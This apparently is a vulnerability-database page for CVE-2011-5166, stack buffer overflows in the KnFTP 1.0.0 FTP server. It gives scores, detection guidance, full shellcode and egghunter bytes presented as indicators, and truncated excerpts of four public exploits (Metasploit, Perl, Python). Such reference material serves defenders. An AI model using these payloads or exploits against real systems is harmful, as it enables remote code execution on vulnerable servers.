CVE-2011-5166
published 2012-09-15CVE-2011-5166: Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote attackers to execute arbitrary code via a long string to the (1) USER, (2) PASS, (3) REIN…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.48%
92.9th percentile
Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote attackers to execute arbitrary code via a long string to the (1) USER, (2) PASS, (3) REIN, (4) QUIT, (5) PORT, (6) PASV, (7) TYPE, (8) STRU, (9) MODE, (10) RETR, (11) STOR, (12) APPE, (13) ALLO, (14) REST, (15) RNFR, (16) RNTO, (17) ABOR, (18) DELE, (19) CWD, (20) LIST, (21) NLST, (22) SITE, (23) STST, (24) HELP, (25) NOOP, (26) MKD, (27) RMD, (28) PWD, (29) CDUP, (30) STOU, (31) SNMT, (32) SYST, and (33) XPWD commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| elif_keir | knftp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18\x9c\x61
bytes↗
\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
- →Detect oversized FTP command arguments: alert on any FTP command (USER, PASS, RETR, STOR, MKD, PWD, CWD, etc.) with argument length exceeding ~271 bytes, which is the documented shellcode buffer space. ↗
- →Detect the W00T egghunter tag in FTP traffic; the double-tag pattern 'W00TW00T' (bytes \x54\x30\x30\x57\x54\x30\x30\x57) in a PASS command payload is a strong indicator of exploitation. ↗
- →Monitor for FTP PASS commands containing large NOP sleds (\x90 repeated) followed by shellcode bytes, indicative of stack-based buffer overflow exploitation against KnFTP. ↗
- →Flag FTP sessions sending 9000+ byte buffers to any FTP command (e.g., PWD), as this is the documented crash/DoS payload size for KnFTP SEH overwrite. ↗
- →knftpd.exe is the only non-SafeSEH module in KnFTP; process-level monitoring for knftpd.exe spawning unexpected child processes (e.g., calc.exe, cmd.exe) indicates successful exploitation. ↗
- →Vulnerable FTP commands include MKD, LS (NLST), ABOR, CD (CWD), APPE, REST, PWD — monitor all of these for abnormally long arguments on port 21. ↗
- ·ROP gadget addresses and .data section addresses are specific to Windows XP SP2/SP3 Spanish and Windows 7 Professional SP1 Spanish builds of msvcrt.dll; they will not apply to other language versions or patch levels. ↗
- ·The JMP ESP EIP overwrite address (0x7C874413 in kernel32.dll) is specific to Windows XP SP3; this address will differ on other OS versions or service packs. ↗
- ·The DoS/SEH PoC was tested with DEP disabled; exploitation reliability changes when DEP is enabled (the Metasploit module specifically addresses DEP bypass via ROP). ↗
- ·The exploit overwrites EIP with smaller payloads but switches to SEH overwrite with larger payloads; detection thresholds should account for both overflow sizes. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
KnFTP 1.0 - Remote Buffer Overflow (DEP Bypass) (Metasploit)
exploitdb·2011-11-07
CVE-2011-5166 KnFTP 1.0 - Remote Buffer Overflow (DEP Bypass) (Metasploit)
KnFTP 1.0 - Remote Buffer Overflow (DEP Bypass) (Metasploit)
---
#module for metasploit framework, for more information
#see the Description.
#Copyright (C) October 04th 2011
#Author: Javier Aguinaga (pasta) el.tio.pastafrola[at]gmail.com
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#alon
Exploit-DB
KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow
exploitdb·2011-09-19
CVE-2011-5166 KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow
KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow
---
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit,'USER' command
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
#!/usr/bin/perl
use IO::Socket;
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command.
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
print "\n#----[ mr.pr0n ]---------------------------------------------------------#\n";
print "# Target App: KnFTP 1.0.0 Server #\n";
print "# Attack : Remote Buffer Overflow Exploit - 'USER' command #\n";
print "# Target OS : Windows XP Pro En
Exploit-DB
KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)
exploitdb·2011-09-18
CVE-2011-5166 KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)
KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)
---
#!/usr/bin/python
# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/
# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwriten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX
Exploit-DB
KnFTP Server - Remote Buffer Overflow
exploitdb·2011-09-12
CVE-2011-5166 KnFTP Server - Remote Buffer Overflow
KnFTP Server - Remote Buffer Overflow
---
#!/usr/bin/python
# tested on windows xp sp3
# overwrites EIP
# seh is overwritten with larger payloads
# knftpd.exe is the only non safeseh module
import sys,socket
print "\n====================="
print "KnFTP Buffer Overflow"
print " Written by Blake "
print "=====================\n"
if len(sys.argv) !=3:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
# 271 bytes of space for shellcode
# 227 bytes windows/exec CMD => calc.exe
shellcode =(
"\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8"
"\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19"
"\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49"
"\x5e\xc
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2011-09/0015.htmlhttp://secunia.com/advisories/45907http://www.exploit-db.com/exploits/17819http://www.exploit-db.com/exploits/17856http://www.exploit-db.com/exploits/17870http://www.exploit-db.com/exploits/18089http://www.osvdb.org/75147https://exchange.xforce.ibmcloud.com/vulnerabilities/69557http://archives.neohapsis.com/archives/bugtraq/2011-09/0015.htmlhttp://secunia.com/advisories/45907http://www.exploit-db.com/exploits/17819http://www.exploit-db.com/exploits/17856http://www.exploit-db.com/exploits/17870http://www.exploit-db.com/exploits/18089http://www.osvdb.org/75147https://exchange.xforce.ibmcloud.com/vulnerabilities/69557
2012-09-15
Published